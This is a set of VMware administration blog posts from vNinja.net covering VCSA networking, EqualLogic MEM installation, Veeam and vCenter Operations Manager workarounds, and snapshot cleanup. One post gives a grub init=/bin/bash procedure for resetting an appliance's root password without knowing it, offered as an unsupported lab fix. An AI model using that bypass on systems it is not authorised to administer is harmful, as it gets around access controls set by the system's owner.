3. Edit ifcfg-eth1 and replace the networking information with your values, here is how mine looks:

```
DEVICE=eth1
BOOTPROTO='static'
STARTMODE='auto'
TYPE=Ethernet
USERCONTROL='no'
IPADDR='172.16.1.52'
NETMASK='255.255.255.0'
BROADCAST='172.16.1.255'
```

4. Create a symlink for this file in /etc/sysconfig/network:

```
ln -s /etc/sysconfig/networking/devices/ifcfg-eth1 /etc/sysconfig/network/ifcfg-eth1
```

5. Restart the networking service to activate the new setup:

```
service network restart
```

6. Check the VCSA web management interface to verify that the new settings are active

By adding a secondary NIC, configuring it and connecting it to the isolated vSwitch, I was now able to add my sequestered nested ESXi hosts to my existing VCSA installation. There may be several reasons for a setup like this: perhaps you want your VCSA to be available on a management VLAN but reach ESXi hosts on another VLAN without having routing in place between the segmented networks, or you just want to play around with it like I am in this lab environment.

Disclaimer: Is this supported by VMware? Probably not, but I simply don't know. Caveat emptor, and all that jazz.

Update February 2016 # This post is written with VCSA 5.x in mind, and is not tested on VCSA 6.x.
William Lam has posted Caveats when multi-homing the vCenter Server Appliance 6.x w/multiple vNICs with information on what caveats exist if you are looking to do this with the newer v6.x infrastructure.

--- # Installing Dell Equallogic Multipathing Extension Module (MEM) in vSphere 5.1 URL: https://vNinja.net/virtualization/installing-dell-equallogic-multipathing-extension-module-mem-vsphere-5-1/ Date: 2013-04-22 Author: christian Tags: Dell, Equallogic, ESXi, HowTo, Multipath, storage, vSphere

Dell offers a Multipathing Extension Module (MEM) for vSphere, and in this post I'll highlight how to "manually" install it on an ESXi 5.1 host. I will not cover the network setup part of the equation, but rather go through the simple steps required to get the MEM installed on the hosts in question.

First of all, you need to download the MEM installation package. At the time of writing, the latest version is v1.1.2.292203, available from equallogic.com. Once the archive file is acquired, unzip it and upload the dell-eql-mem-esx5-1.1.2.292203.zip file to a shared location available in your environment. For the example below, I have used a VMFS datastore that is available to all the hosts in this particular cluster.

Note: The host in question has already been put in maintenance mode, to make sure no VMs are actively using the storage paths while installing the module.

The VIB file, which resides inside the dell-eql-mem-esx5-1.1.2.292203.zip file, can be installed using several techniques: by using the vMA, the vSphere Command-Line Interface (vSphere CLI), vSphere Update Manager, or even by logging in to the hosts via an SSH connection. In this case I opted for doing it through SSH. The command required to install the MEM is as follows:

esxcli software vib install --depot /vmfs/volumes/vmfsvol/dell/dell-eql-mem-esx5-1.1.2.292203.zip

A completed installation looks like this:

login as: root Using keyboard-interactive authentication.
Password: The time and date of this login have been sent to the system logs. VMware offers supported, powerful system administration tools. Please see www.vmware.com/go/sysadmintools for details. The ESXi Shell can be disabled by an administrative user. See the vSphere Security documentation for more information.

~ # esxcli software vib install --depot /vmfs/volumes/vmfsvol/dell/dell-eql-mem-esx5-1.1.2.292203.zip
Installation Result
Message: Operation finished successfully.
Reboot Required: false
VIBs Installed: Dell_bootbank_dell-eql-host-connection-mgr_1.1.1-268843, Dell_bootbank_dell-eql-hostprofile_1.1.0-212190, Dell_bootbank_dell-eql-routed-psp_1.1.1-262227
VIBs Removed:
VIBs Skipped:
~ #

I then restarted the hostd process, to make sure that the multipath module is activated:

~ # /etc/init.d/hostd restart
watchdog-hostd: Terminating watchdog process with PID 9592
hostd stopped. hostd started.
~ #

Finally, a quick check to see if the new Equallogic namespace is available, and that it is gathering statistics, i.e. being used:

~ # esxcli equallogic stat summary
DeviceId                         VolumeName PathCount Reads Writes KBRead KBWritten
6090A098E0DC5D9F71E6940292F8569C vmvolume   2         2573  30     20429  14
6090A098D06C5A31CEDE44CC17CBF14B test2t     2         651   30     13028  14
6090A098D06C4AF067EDD4C904C6A453 vmvolume3  2         642   30     10592  14
6090A098C08D5E928EE634938F42605B vmvolume1  2         1834  30     20023  14
~ #

Screenshots displaying the ESXi host path policy before and after installing the Dell Equallogic MEM:

--- # It's Not Your Average Data, it's vOpenData URL: https://vNinja.net/virtualization/its-average-data-its-vopendata/ Date: 2013-04-12 Author: Tags: Awesome, Community, Statistics

So, what is the average airspeed velocity of an unladen swallow? As we all (should) know, that is very much a trick question. Now, consider this little non-trick question: I wonder what the avg disk size is for your virtual machine these days.
I do most math with 60GB on avg, but wonder if that has changed > [@DuncanYB](https://twitter.com/DuncanYB/status/317269670195507203) / March 28th 2013

And now, guess what? Just 16 days later, a brand new data mining tool has emerged, based on that initial question. vOpenData is now live, in an attempt to answer these kinds of questions. Simplistically put, this site gathers anonymous data from your virtual infrastructure and puts it into a global dataset ready for analysis and presentation. As data is contributed from various sources, the public dashboard is updated. Another great community-driven resource is born, this time by Ben Thomas and William Lam. Announcement posts: vOpenData – Crunching Everyone's Data For Fun And Knowledge and vOpenData: An Open Virtualization Community Database. Check it out and help out by contributing your data if you can.

--- # Brilliant idea: VMware Hosted Beta URL: https://vNinja.net/vmware-2/brilliant-idea-vmware-hosted-beta/ Date: 2013-03-27 Author: christian Tags: Beta, Hands-on Labs, HoL, Hosted Beta, labs, Virtualization, VMware

Duncan Epping rather unceremoniously published a blog post "New Beta Program offering: VMware Hosted Beta" yesterday, outlining the availability of the new hosted beta offering that accompanies some of the current VMware beta programs. Due to the very NDA nature of the beta programs, I can't really go into details on what is currently offered, but what I can say is this: Well done, VMware! The VMware Hosted Beta runs on the same engine that runs the VMware Hands-on Labs Online – Beta, but with a little added twist. You connect to the hosted beta through a web interface, before the actual connection is handed over to a locally installed VMware Horizon View client. This works very well, and I got to play around with it a bit yesterday.
The idea of a hosted beta like this really resonates with me, as one of the major time sinks when it comes to actively participating in betas is the physical setup of a lab environment. As I am currently without a properly powerful lab, something that will change very soon I hope, getting hosted beta access could not be more welcome. This way I get to dip my toes in the beta offerings, without having to procure the required hardware. While I don't think the hosted beta replaces the need for a dedicated physical lab, it sure does work as an excellent stop-gap in the meantime. It also means that you can jump in and out of various pieces of the beta, without having to spend a lot of time configuring an environment from scratch. In addition, this also means that you can get a working environment set up in a matter of minutes, and all you need is ~~love~~ an internet connection.

Of course, VMware does not want everyone to run all their beta testing in this environment; they need feedback on installation and configuration issues in "real world" scenarios as well as plain old feature testing in a controlled environment. But this is a very welcome addition in my mind. Kudos to the HoL and Beta teams at VMware, this makes my day so much easier and I am sure it will also help them in getting better feedback from us beta testers.

--- # Backing up vCenter DB with Veeam B&R 6.5 URL: https://vNinja.net/virtualization/backing-up-vcenter-db-with-veeam-br-6-5/ Date: 2013-03-25 Author: Tags: automation, Backup, Ops, realworld, vCenter, Veeam, VMware, vSphere, workaround

It's a well-known problem that with Veeam Backup & Replication 6.5, and earlier, backing up the SQL server that hosts the vCenter DB poses a problem. KB1051 VSS for vCenter outlines the issue well, and provides a workaround.
If you experience this problem, you will see entries like this in your Veeam B&R backup logs: Veeam vCenterDB Backup Error

The workaround provided by Veeam is to create VM-Host Affinity Rules, effectively pinning a VM to a given host, and then perform the VM backup through the host rather than through the vCenter. While this might be a way to work around the failed backup scenario, it effectively limits some of the flexibility you have in a virtualized environment. I want to have my VMs roaming around my datacenter utilizing DRS, and by pinning a VM to a given host that flexibility is reduced for the VMs in question. I can appreciate why this issue appears, and why the workaround works, but frankly there has to be a better way of doing this. Hopefully this issue will be sorted in the next v7 version of Veeam B&R, as there certainly are ways for Veeam to work around the issue and make this a more seamless experience for the backup administrator.

Proposal #

Why not create a new option in the backup job, where you define that this particular job should run through a host, instead of the vCenter? If selected, Veeam B&R would query the vCenter for which host the given VM resides on, then connect to the host itself and perform the backup through it. That way we could work without having to set VM-Host Affinity Rules, yet still keep vCenter out of the loop when the actual backup is performed. Doing such a query is pretty easy; below is an example using PowerCLI:

Get-VMHost -VM dbserv | fl -Property Name

Name : esx02

This simple query returns the host that the given VM resides on at the given time. Why not do something like this inside of Veeam B&R to make sure that vCenter DB backups work, without having to resort to VM-Host Affinity Rules?
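Sketched in PowerCLI terms, the per-job logic I am proposing would be something along these lines (the Connect-VIServer hand-off and the $hostPassword variable are my assumptions of how Veeam could implement it, not an actual Veeam feature):

```powershell
# Ask vCenter where the VM currently lives...
$esxHost = Get-VMHost -VM (Get-VM -Name dbserv)

# ...then connect to that host directly and run the backup through it,
# keeping vCenter (and its database) out of the data path.
Connect-VIServer -Server $esxHost.Name -User root -Password $hostPassword
```

Since DRS can move the VM between backup runs, the lookup would simply be repeated at the start of every job.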
--- # Preserve your Veeam B&R Backup Jobs when Moving vCenter URL: https://vNinja.net/virtualization/preserve-veeam-br-backups-jobs-moving-vcenter/ Date: 2013-03-19 Author: christian Tags: Ops, vCenter, Veeam, Veeam Backup & Replication, VMware, vSphere, workaround

This week I'm working at a client site, upgrading their entire existing vSphere 4.1 infrastructure to vSphere 5.1. The customer engagement also includes upgrading Veeam Backup and Replication 6.0 to 6.5, and usually an isolated upgrade of Veeam B&R is a no-brainer next, next, next, done install. To complicate things in this particular environment, I also had to migrate the vCenter SQL DB from a local MS SQL Server 2005 Express instance to a full-fledged MS SQL Server 2008 R2 instance. Of course, it was also decided to move the vCenter installation from a physical server to a VM in the same operation. To be able to have an exit path until the vSphere 4.1 hosts' management agents were reconfigured, a new vCenter VM was created with a new IP address and server name.

After the migration from vCenter 4.1 to 5.1, and from physical to virtual, was completed, the existing Veeam B&R server was upgraded to the latest 6.5 release. Now, this is where things started to get a bit interesting with regards to the existing Veeam B&R backup jobs. As far as the Veeam B&R server was concerned, the new vCenter was unknown and the old one was no longer anywhere to be found on the network. If you add the new vCenter to the Veeam B&R server, you will need to either redefine all the existing backup jobs by adding the same VM from the new vCenter to the existing job, and keep the old one around until your retention period has passed (and have it fail on the existing VM object until it's removed), or you will have to recreate all the jobs pointing to the new vCenter instance and start new "first time backups" for all the VMs. For some reason you simply can not rename/redefine your vCenter connection inside of the Veeam B&R GUI.
Thankfully there is an easy way to work around this issue, without having to mess about with the Veeam B&R database: create a DNS alias! That's right, the solution was that simple. I created a DNS CNAME alias pointing the old vCenter network name to the new vCenter network name. After doing that, I had to re-enter the credentials for the vCenter connection in Veeam B&R to force a reconnect, and all of a sudden all existing backup jobs were present again and working as intended. The reason this works is that changing the vCenter name and/or IP address (or even moving it to a new server) does not change the VM identification number (vmid) or Managed Object Reference (MoRef); in essence, the VMs stay the same and Veeam B&R can continue managing them as before. Now, can we please get an option to update the registered vCenter name in Veeam Backup & Replication v7.0?

Update: Check out Veeam vCenter Migration Utility for a small utility to help you move Veeam B&R jobs after replacing your vCenter.

--- # Autolab goes Cloudy with a Chance of Free Credits URL: https://vNinja.net/virtualization/autolab-meets-cloud/ Date: 2013-03-14 Author: christian Tags: Alastair Cooke, Autolab, Cloud, Freebie, fun, Lab, Mike Laverick, VMware, vSphere

Autolab, that awesome "little" thing that automagically builds a nested vSphere lab environment for you, was definitely not put together by Flint Lockwood but by Alastair Cooke (www.demitasse.co.nz). Unlike Flint's inventions, this one actually makes sense and serves a purpose! Now, how sweet would it be to deploy Autolab without having to invest time, money and effort into acquiring your own hardware? Well, thanks to baremetalcloud.com, you might now actually be able to do just that (and more, if you wish). Of course, this is a paid service, but Mike Laverick has secured a deal where the first 100 sign-ups using his promo code get free credits to play around with!
For more details, including promo code and setup information, check "Bare Metal Cloud for your Auto-Lab".

--- # Keep Calm And ... URL: https://vNinja.net/virtualization/calm/ Date: 2013-03-02 Author: christian Tags: fun, Keep Calm, Posters

I needed some new wall "art" for my home office, and decided that a couple of small "Keep Calm" posters would do the trick. Naturally I got a bit carried away and created more than one, and of course, most of them are virtualization related. If you have some ideas, I'll gladly create more, just leave a comment! I would also love photos if you printed out any of these and put them on a wall or in a frame somewhere. Or even better, on a T-Shirt!

--- # Want a Free Pass to TechEd 2013? URL: https://vNinja.net/news/free-pass-teched-2013/ Date: 2013-02-26 Author: christian Tags: contest, fun, Give-away, Veeam

Our sponsor Veeam is giving away a free pass to TechEd 2013 in this month's giveaway. Register now to be entered into the draw before March 18th, when the winner will be announced.

--- # Trainsignal: Training as a Service (TaaS) URL: https://vNinja.net/news/trainsignal-training-service-taas/ Date: 2013-02-22 Author: christian Tags: Certification, Cisco, Microsoft, Training, Trainsignal, VMware

Trainsignal has just launched a new Online Training bundle, and for $49 a month you can get unlimited access to their entire set of training courses and practice exams for Cisco, Apple, Microsoft, Citrix, CompTIA, and VMware. The new pricing is very attractive, especially since you no longer need to buy access on a course-by-course basis. The courses are delivered in your browser, but Trainsignal also offers an offline player in case you need access when traveling or otherwise offline. Give it a test run today; by signing up now (referral link) you get three days full access for free.
--- # New Fling from VMware Labs: Makyo URL: https://vNinja.net/vmware-2/fling-vmware-labs-makyo/ Date: 2013-02-21 Author: christian Tags: Fling, Makyo, Plugin, Suggestion, VMware

VMware Labs has released a new fling called Makyo (魔境 makyō means "ghost cave" or "devil's cave"), which basically is a tool to copy VMs or vApps from one vCenter instance to another. It works by doing an automated OVF export on the source vCenter, and then an import on the destination vCenter. The plugin integrates directly into the vSphere Web Client, and I hope to see this feature installed by default in future versions of the Web Client.

A small suggestion: #

I hope that in future versions of Makyo, you could use the same tool to copy VMs or vApps from standalone ESXi hosts into your vCenter infrastructure. Today you can use VMware Workstation to move and copy between local Workstation storage, standalone ESXi hosts and vCenter-managed infrastructure, and adding the same kind of feature set to the Web Client would be great. It would make it easier to migrate from small test environments to live production environments, all inside the vSphere Web Client.

--- # Voting Open for the 2013 Top VMware & Virtualization Blogs URL: https://vNinja.net/virtualization/voting-open-2013-top-vmware-virtualization-blogs/ Date: 2013-02-20 Author: christian Tags: bloggers, vlaunchpad, Vote, vsphere-land

Eric Siebert has yet again gone through the massive job of setting up his yearly Top VMware & Virtualization Blogs vote. Huge kudos to Eric, I know this is a big undertaking for you, and myself and the rest of the community really appreciate the hard work you put into this each year! Go ahead and cast your vote before the cut-off date of March 1st. vNinja.net is listed in the general section, feel free to vote for us if you feel like we deserve it.
--- # Unsupported Network Configurations in Virtual Appliances URL: https://vNinja.net/vmware-2/unsupported-network-configurations-virtual-appliances/ Date: 2013-02-19 Author: christian Tags: fun, labs, Linux, SUSE, Unsupported, Virtual Appliance, VMware, vSphere

My recent experience with setting up vCenter Operations Manager on a standalone ESXi host, and the always excellent William Lam's post Automating VCSA Network Configurations For Greenfield Deployments, got me thinking. There are several other appliances out there that require deployment to a vCenter to be able to configure the networking options and not just default to DHCP. In many, and perhaps even most, cases you can work around that by running the vami_set_network command to change from DHCP to STATIC network configurations. All of that is fine and dandy, and pretty straightforward, but there is one smallish caveat: you need root access to be able to reconfigure the networking. Without it, you will see error messages such as these (shortened for brevity):

localhost:~ # /opt/vmware/share/vami/vami_set_network eth0 STATICV4 192.168.5.98 255.255.255.0 192.168.5.1
/sbin/ifdown: line 233: /dev/.sysconfig/network/config-eth0: Permission denied
IOError: [Errno 13] Permission denied: '/opt/vmware/etc/vami/vami_ovf_info.xml'
Unable to set the network parameters

So, what if you don't know the appliance root password? Most virtual appliances are Linux based, and in this particular case the flavor used was SUSE Enterprise Linux 11. To reset the root password on a grub-based Linux appliance, like SUSE, follow the recipe below:

Note: As William Lam pointed out, this procedure only works if there is no grub password set. If that's the case, download a LiveCD, mount the filesystem and run the password change from there. If the filesystem in the appliance is encrypted, well, then all bets are off.
In the grub menu, select the kernel you want to boot and press Tab to shift focus to "Boot Options". Now type init=/bin/bash and press Enter to continue. You will see a prompt that looks like (none):/ # in the terminal. Run the passwd command in the terminal to change the password for root:

(none):/ # passwd
New Password:
Reenter New Password:
Password changed.

Reboot the appliance, let it boot up normally, and you should now be able to log on as root, with your newly configured password, and run the vami_set_network command to configure static IP addressing.

localhost:~ # /opt/vmware/share/vami/vami_set_network eth0 STATICV4 192.168.5.19 255.255.255.0 192.168.5.1
eth0 device: Intel Corporation 82545EM Gigabit Ethernet Controller (Copper) (rev 01)
eth0 device: Intel Corporation 82545EM Gigabit Ethernet Controller (Copper) (rev 01)
Network parameters successfully changed to requested values
localhost:~ #

Do yet another reboot, and you should be up and running with a static IP configuration on an appliance deployed without the advanced OVF/OVA properties normally required for that kind of deployment. This procedure is more than likely NOT supported by your vendor, and changing the root password might have other consequences for the appliance. If the vendor does not supply the root password in their documentation, there is likely to be a reason for that, but the procedure above shows that not supplying it does not actually prevent anyone from changing it. USE AT OWN RISK.

--- # Purging the vCenter Operations Manager 5.x Database URL: https://vNinja.net/vmware-2/purging-vcenter-operations-manager-5-x-database/ Date: 2013-02-05 Author: christian Tags: vCenter, vCenter Operations Manager, Virtualization, VMware

A client of mine recently had their vCenter 5.0 appliance replaced with a new vCenter 5.1 appliance, something vCenter Operations Manager did not enjoy.
In this case the original vCenter 5.0 Appliance was shut down, a new 5.1 Appliance was deployed with the same IP as the old one, and then configured. Naturally the existing hosts were added to the fresh vCenter, clusters were recreated and in general everything was reconfigured. Why a simple upgrade from 5.0 to 5.1 wasn't performed is beyond me, but the end result was that the existing vCenter Operations Manager I had deployed in this environment was no longer able to monitor the environment. Simply removing the registration of the old vCenter and replacing it with the new instance was not trivial, as this generated an exception in the vCenter Operations Manager admin interface:

Exception occurred during vCenter Server registration. UUID is not available for the currently registered vCenter ([https:///sdk). This can happen if you added the vCenter from custom UI instead of the admin UI. Please contact support to fix the problem and then attempt to register a new vCenter.

Trying to force the registration from the command line on the vCenter Operations Manager UI VM using the following command also failed, with the same error message:

vcops-admin register update --vc-name [vc-name] --vc-server [https://vc-server/sdk] --username [vc-username] --password [vc-password] --force

Naturally the issue was caused by the non-standard "upgrade" performed on the vCenter, but the end result was that I no longer had old performance data available anywhere. The vCenter database was no longer available, since no actual upgrade was performed, and the old vCenter had been removed from vCenter Operations Manager.
My first thought was to simply delete and re-deploy vCenter Operations Manager, but since I was working remotely this wasn't really a viable option, considering that the OVF package was located on my local machine and not in the client's network. After some playing around to try to avoid deploying again over a slow WAN link, I discovered a somewhat undocumented parameter for the vcops-admin command (run on the UI VM command line):

vcops-admin purge --vc-name

This parameter is not listed in the man pages for the vcops-admin command, and what it does is completely purge a previously registered vCenter. And by purge, it really means purge. All traces of the old vCenter data are removed from the vCenter Operations Manager database; any old performance data and metrics are completely removed. In my case this was exactly what I was looking for, since the alternative was to redeploy the whole vCenter Operations Manager package. Normally this is not something you want to do, it would be preferable to figure out the root cause of your issues instead of purging your existing database and losing historic data, but in some cases this can come in handy. One example would be if you are playing around with vCenter Operations Manager in your lab environment; this is a quick and easy way to start over instead of re-deploying.

--- # Goodbye Mr. Herrod URL: https://vNinja.net/vmware-2/goodbye-mr-herrod/ Date: 2013-01-23 Author: christian Tags: News, Quote, Steve Herrod, VMware

SearchServerVirtualization published an article today called "Experts weigh in on CTO Herrod's departure, future of VMware" where I have been quoted in regard to Steve Herrod's departure from VMware. While the quote itself is correct, I feel that there is a need to further expand on what I said, in the context it was given in. So here it is, my entire response:

My reaction to Steve Herrod's departure is probably on par with just about everyone else's, one of surprise.
While I cannot comment on the internal workings of VMware, Mr. Herrod's impact and influence on their public image has been immense and his shoes will be very hard to fill. That being said, I cannot imagine that VMware does not have a plan in place for this new post-Herrod era; it may be news to us, but I'm certain that this is something that has been known internally for quite some time. Mr. Herrod has been very vocal, and influential, and replacing him is not something VMware should treat lightly. Steve put much emphasis on the T in CTO, and whoever is to replace him needs to be on par with the technical level of his predecessor, after all that's where Mr. Herrod excelled. He knows the tech, and knows how to market it both to executives and techies alike, no small feat in itself. On the other hand, VMware does have a very passionate and vocal community, and I'm sure that there is someone lurking in the shadows just waiting for the opportunity to step up into the light and move VMware forward. Each time high profile executives have left VMware, and there have been a few, VMware has excelled and not looked back. I hope, and believe, that the same will be true this time around; after all, VMware is driven by engineers, not marketing or executive level positions. The tech is at heart, at least that's my impression. Lastly, I would like to thank Steve Herrod for his tenure at VMware. He's been a leading light and a reliable voice in an ever changing world. I wish him the best of luck in his future endeavors, not that I think he'll need it, people of Steve's calibre seldom need luck. (yes, yes, I know. It should have been Dr.
Herrod)

--- # vCenter Operations Manager and vCenter Deployment Dependency URL: https://vNinja.net/vmware-2/vcenter-operations-manager-vcenter-deployment-dependency/ Date: 2013-01-16 Author: christian Tags: vCenter, vCenter Operations Manager, Virtualization, VMware, vSphere, workaround

In order to be able to deploy vCenter Operations Manager, the ESXi host it is deployed to needs to be managed by a vCenter. At first glance, that seems like a fair and pretty straightforward requirement, right? But is it? While I can see the need for a vCenter in the environment that vCenter Operations Manager is supposed to monitor, I don't understand why the host you want to deploy the vApp on has to be managed by a vCenter instance as well. I encountered this exact scenario at a client site today: what do you do if you want to deploy vCenter Operations Manager on a standalone ESXi host, and have it monitor a production vSphere environment which has a running vCenter installation?

The vCenter Operations Manager 5 Deployment and Configuration Guide clearly states that in order to deploy and run the vCenter Operations vApp, vCenter Server 4.0 U2 or later is required:

vCenter Server and ESX Requirements: The vCenter Operations Manager vApp requires the following vSphere environment. vCenter Operations Manager is compatible with:
- System that serves as the target of data collection: VMware vCenter Server 4.0 U2 or later
- System running the vApp: VMware vCenter Server 4.0 U2 or later
- Host running the vApp: ESX/ESXi 4.0 or higher

And in the Deploy the vCenter Operations Manager vApp section of the same document: Do not deploy vCenter Operations from an ESX host. Deploy only from vCenter Server.
The reason why the client wanted to deploy vCenter Operations on a standalone, unmanaged host was pretty simple: they are experiencing some rather serious performance issues, and wanted to use vCenter Operations Manager to help identify the bottlenecks and document them, but did not want vCenter Operations Manager itself to influence the performance of the production cluster(s). I was able to “work around” the issue by temporarily setting up a vCSA in trial mode, registering the ESXi host, deploying the vCenter Operations Manager vApp to the new vCSA, configuring it, and then subsequently shutting the vCSA down again. In fact, there is even an option in the configuration to not monitor the vCenter instance it's deployed on, so someone else must have had some mildly similar thoughts at one point. While this will work, it's not ideal having to jump through hoops like this to deploy a management solution. I'll happily admit that this is a fringe case, and not the most common deployment scenario, but I would still like to see VMware do something about the vCenter requirement for the host the vApp is deployed on. Requiring vCenter for the hosts and clusters it's monitoring is fine, and expected, but why does the host it's deployed on require it? --- # Dell (VKernel) vOPS Server Explorer 6.3 Released URL: https://vNinja.net/virtualization/dell-vkernel-vops-server-explorer-6-3-released/ Date: 2013-01-14 Author: christian Tags: Dell, Free Tool, Monitoring, Release, Virtualization, VKernel, vOPS vOPS 6.3 Environment Explorer Yesterday fellow vExpert Mattias Sundling gave me a little pre-release briefing of the new Dell/VKernel vOPS Server Explorer 6.3 release. While I don't normally do press release posts like these, I'm willing to make an exception in this case.
Not only is vOPS Server Explorer 6.3 available in a free version, with the familiar tools from previous versions, the new release also comes armed with a couple of interesting new tools in the suite:

Storage Explorer
- Extensive storage performance and capacity views across datastores and VMs
- Identifies critical datastore issues such as overcommitment, low capacity, high latency, and VMFS version mismatch
- Identifies critical VM issues such as low available disk space, high latency and throughput
- Allows the user to sort on any metric to find specific issues relevant to them

Change Explorer
- Lists all changes that occurred to datacenters, clusters, resource pools, hosts, datastores and VMs within the last seven days, with associated risk impact
- Allows the user to filter on object name, user and type to find specific changes
- The number of changes is also represented graphically over time, showing when they are occurring

Both of these are new tools in v6.3 of the vOPS Suite, and incredible value for a free product. The familiar tools from previous versions are still available too:

Environment Explorer
- Identify critical VM configuration errors such as memory limits and old snapshots
- Recognize performance bottlenecks
- Detect inefficiency/waste created by VMs with resource over-allocation
- Find available capacity, expressed as the number of additional VMs that can be deployed

vScope Explorer
- Visualize performance issues in VMs and hosts across the environment
- Assess environment-wide host capacity
- Spot inefficient datastores and VMs
- See all VMs, hosts and datastores across many vCenters and data centers on one screen

SearchMyVM Explorer
- Search for VMs, hosts, clusters and resource pools in an environment
- Create and save advanced searches
- Export search results in XML, CSV and PDF format

In addition to the new tools, vOPS™ can connect to and monitor Hyper-V (requires System Center) and Red Hat hypervisors from a single appliance, deployed once in your infrastructure.
The vOPS minimum requirements are also not that bad compared with other monitoring solutions on the market:

- 2 vCPUs
- 4 GB of memory
- 64 GB of storage space
- VMware ESX 3.0 or vCenter 2.5 or higher
- Microsoft SCOM 2007 R2 or higher + SCVMM 2008 R2 or higher
- Red Hat Enterprise Virtualization Manager 3.0 or higher

Watch the videos above, and if this is something you find interesting, head on over to the vOPS™ Server Explorer site and download your free copy now! --- # Want a VMware Workstation License? URL: https://vNinja.net/virtualization/vmware-workstation-license/ Date: 2013-01-10 Author: christian Tags: contest, fun, VMware, Workstation Christopher Kusek, who runs pkguild.com, has just announced that he is running a contest where you can win a VMware Workstation 9 license. Seeing that announcement, and the fact that Christopher was nice enough to mention both me and vNinja.net in it, I have decided to also give away a license that has been lingering unused in my possession way too long. Instead of running my own contest, my license has been added to the existing contest, so head on over there to read all the details. If VMware Workstation does not tickle your fancy, perhaps Luigi Danakos' VMware Fusion 5 contest is more up your alley. Good luck! --- # Fun and Games with VDR and Snapshots URL: https://vNinja.net/virtualization/fun-games-vdr-snapshots/ Date: 2013-01-10 Author: christian Tags: Datastore, Snapshot, VDR, VMware, vSphere One of the smaller improvements in vSphere 5 was the introduction of the “Virtual machine disks consolidation is needed” configuration alert, shown if vSphere determines that there are orphaned snapshots for a given VM. Previous versions do not show this warning message, and datastore usage could potentially skyrocket for no apparent reason if something keeps creating snapshots that are not properly cleaned up when they are no longer in use.
Unless there is active space monitoring for your datastores, and there should be, it could go on unnoticed for some time. Running a snapshot consolidation attempts to clean up this situation, removing the orphaned snapshots and reclaiming the space they occupy. This video from VMware shows how this is done, and how it should work: For more info, have a look at KB2003638 Consolidating snapshots in vSphere 5.x While it is great that you get alerted when this happens, and that there is an option to clean it up directly in the vSphere Client, what do you do if consolidation doesn't work for some reason? I recently visited a client who had problems with their VDR appliance, where every attempted backup left orphaned snapshots behind. By default VDR has a retry interval of 30 minutes for failed backups (BackupRetryInterval=30 in datarecovery.ini) before it times out. In the space of 30 minutes, VDR did 30 backup attempts, effectively creating 30 orphaned snapshots each time a backup was attempted. One of the affected VMs had over 300 delta files accumulated over a fairly small timeframe. There clearly were a lot of snapshots in the datastore, but for some reason the vSphere Client Snapshot Manager did not show any snapshots for the VM. Clearly there was an inconsistency here, and after investigating the VM.vmsd file it became fairly apparent what was going on. The VM.vmsd file is responsible for keeping tabs on the snapshot delta-vmdk files, and is the source the Snapshot Manager uses to display and manage them. The case here was that when a snapshot is removed, the snapshot entry in the VM.vmsd is removed before the changes are made to the child disks. When VDR subsequently had problems removing the child disks, they were left behind. Combine this with the fact that the maximum number of redo logs supported is 255, and you can quickly run into a situation where there are snapshots left behind that you can't easily get rid of with the consolidate command.
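A quick way to gauge how bad a VM is affected is to simply count the delta files in its directory on the datastore. A minimal sketch, assuming a POSIX shell; the ESXi datastore path in the comment is hypothetical, and the directory to check is passed as the first argument:

```shell
# Count snapshot delta files in a VM's directory.
# On an ESXi host this would be something like
# /vmfs/volumes/datastore1/MyVM (hypothetical path).
VMDIR="${1:-.}"
# Delta disks follow the <name>-NNNNNN-delta.vmdk naming pattern.
count=$(ls "$VMDIR" 2>/dev/null | grep -c 'delta\.vmdk$')
echo "Delta files found: $count"
```

Anything approaching the 255 redo log limit is a red flag that consolidation is no longer keeping up.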
Cloning the VM was not really an option; since a clone operation actually consolidates snapshots as part of the cloning process, it would fail with the same error. In the end, the solution was to fire up VMware vCenter Converter, and use that to perform a V2V “conversion” of the VMs. Why does this work, when a “native” vSphere clone operation does not? The answer is surprisingly simple: vCenter Converter does not know the virtual disk structure at all. It only sees what the operating system sees, and the OS inside the VM has no concept or knowledge of the snapshots created in vCenter. While this fixed the immediate issue of getting rid of the orphaned snapshots and reclaiming the space wasted by them, it does not fix the underlying root issue that causes VDR not to clean up after itself. For some reason it looks like VDR, after mounting the snapshot files to the appliance, does not release them, thus retaining a lock on the snapshot files. This in turn means that the VM.vmsd file is cleared of VDR snapshots, but the files are still present on the datastore. --- # VMware Hands-on Lab Online Public Beta Review URL: https://vNinja.net/vmware-2/vmware-hands-on-lab-online-review/ Date: 2012-12-06 Author: christian Tags: Hands-on Lab, HoL, Online Training, VMware A little while ago VMware announced Project Nee, something I was, and still am, pretty excited about. This afternoon I finally got access to the Hands-on Labs Online Beta part of Project Nee, and I have to say, this looks incredibly promising and useful. At the moment, the available labs are: Cloud Infrastructure: # HOL-INF-02 - Explore vSphere 5.1 Distributed Switch (vDS) New Features — This lab explores the new features of the vSphere Distributed Switch (vDS). HOL-INF-03 - Automate Your vSphere 5.1 Deployment with Auto Deploy — Learn how to use VMware Auto Deploy to scale and manage ESXi deployments or upgrades.
HOL-INF-04 - Deliver Optimal Performance with VMware vSphere 5.1 — This lab will step you through performance monitoring, troubleshooting, and optimization options in VMware vSphere 5.1. HOL-INF-05 - VMware Site Recovery Manager (SRM) — In this lab you will leverage various VMware technologies to implement disaster recovery protection for a vCloud Director managed infrastructure. HOL-INF-06 - Deploy and Operate Your Cloud with the VMware vCloud Suite — Learn how to build and use the Virtual Datacenter with the vCloud Suite as introduced by Steve Herrod at VMworld 2012. This lab is presented as two 30 minute lightning lab modules. HOL-INF-07 - VMware vCloud Networking and Security (vCNS) — Learn the fundamentals of software defined networking in the VMware vCloud Suite using vCloud Networking and Security (vCNS). Cloud Operations # HOL-OPS-01 - VMware vCenter Operations Manager Enterprise — This lab covers automated performance, capacity, and configuration management with VMware vCenter Operations Manager Enterprise. HOL-OPS-05 - Explore VMware vCenter Operations Manager Enterprise New Features — In this lab you will use new features of VMware vCenter Operations Manager Enterprise edition for performance monitoring, troubleshooting, and optimization of VMware vSphere infrastructure. HOL-OPS-07 - VMware vCenter Orchestrator - “The Undiscovered Country” — This lab introduces the little known yet powerful automation solution, VMware vCenter Orchestrator. End-User Computing # HOL-EUC-03 - Troubleshoot and Optimize VMware View — This lab covers new performance features in View 5.1 with two 30 minute lightning lab modules. HOL-EUC-04 - Discover VMware Horizon Application Manager — Explore VMware Horizon Application Manager through two 15 minute and one 30 minute lightning lab modules. Clearly there is a good collection of content here, and as the catalog gradually expands I'm sure we're in for a lot of great lab modules that are still in development.
